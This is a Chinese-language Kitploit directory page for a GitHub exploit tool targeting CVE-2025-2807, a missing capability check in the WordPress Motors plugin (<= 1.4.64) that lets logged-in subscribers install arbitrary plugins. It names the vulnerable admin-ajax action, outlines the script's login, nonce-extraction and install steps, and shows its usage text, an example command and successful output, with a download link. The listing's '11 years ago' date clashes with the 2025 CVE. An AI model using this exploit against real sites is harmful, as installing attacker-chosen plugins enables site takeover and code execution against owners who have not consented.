Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-2807 — Wordpress - Motors Plugin <= 1.4.64 - 任意插件安装漏洞 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-2807
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubnxploited/cve-2025-2807

CVE-2025-2807

Wordpress - Motors Plugin <= 1.4.64 - 任意插件安装漏洞

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-2807:Motors 插件 <= 1.4.64 - 任意插件安装漏洞

漏洞利用者: Nxploited | Khaled Alenazi


⚠️ 漏洞概要

插件: Motors (<= 1.4.64)
类型: 授权缺失 — 已认证(订阅者+)任意插件安装
严重程度: 8.8(CVSS v3)
发现日期: 2025年4月7日
漏洞披露计划: 无


🔥 漏洞利用影响

该漏洞允许任何已认证的 WordPress 用户(订阅者+) 在没有任何适当授权检查的情况下安装任意插件。

由于 mvl_setup_wizard_install_plugin 函数中缺少能力验证,低权限用户可以执行仅限管理员的操作。

📅 预计会因其简单性和严重影响而被大规模利用。


🚫 技术细节

  • 漏洞端点:/wp-admin/admin-ajax.php
  • 漏洞动作:mvl_setup_wizard_install_plugin
  • 所需访问级别:订阅者+(已登录用户)
  • 核心问题:缺少 current_user_can('install_plugins') 或类似的能力检查

🚀 利用脚本(Python)

该脚本:

  1. 以订阅者身份登录
  2. 提取所需的 nonce(从 HTML 或 JavaScript 中)
  3. 触发存在漏洞的 AJAX 调用以安装你选择的插件

📃 使用方法

root@kitploit:~
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]

Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME     Subscriber username
  -p, --password PASSWORD      Subscriber password
  -pn, --plugin PLUGIN         Plugin to install (default: contact-form-7)

🐞 执行示例

root@kitploit:~
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7

输出:

root@kitploit:~
[*] 正在登录...
[+] 登录成功。
[*] 正在获取设置向导页面...
[+] 在 HTML 中找到 nonce:428cdf8347
[*] 正在尝试安装插件:contact-form-7
[+] 插件安装请求已成功发送!
[+] 响应:{"success":true,"data":"插件成功激活"}


✨ 漏洞利用者:Nxploited(Khaled Alenazi)

下载工具